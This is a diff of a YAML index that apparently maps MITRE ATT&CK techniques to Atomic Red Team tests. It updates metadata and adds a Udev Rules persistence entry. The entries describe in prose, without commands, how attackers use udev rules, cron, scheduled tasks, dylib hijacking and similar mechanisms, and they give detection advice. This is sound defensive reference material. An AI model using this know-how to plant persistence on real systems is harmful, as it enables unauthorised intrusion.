         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -28684,6 +28944,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -28696,7 +28960,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests:
     - name: At - Schedule a job
@@ -28844,9 +29107,67 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -28882,7 +29203,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -28906,12 +29227,11 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -28995,11 +29315,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -29051,9 +29370,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account (Linux)
@@ -29216,7 +29534,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -29254,30 +29572,29 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -29324,7 +29641,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -29356,8 +29673,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -29371,6 +29688,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -29383,16 +29704,19 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -29458,7 +29782,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests: []
   T1129:
@@ -29535,66 +29858,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -29607,31 +29875,83 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -29689,9 +30009,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1559.002:
@@ -29783,20 +30102,19 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests: []
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -29824,7 +30142,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -29844,33 +30162,13 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -29887,6 +30185,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -29897,9 +30196,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -29907,8 +30210,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests:
     - name: Cron - Replace crontab with referenced file
@@ -30062,7 +30381,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -30087,12 +30406,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -30172,11 +30489,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
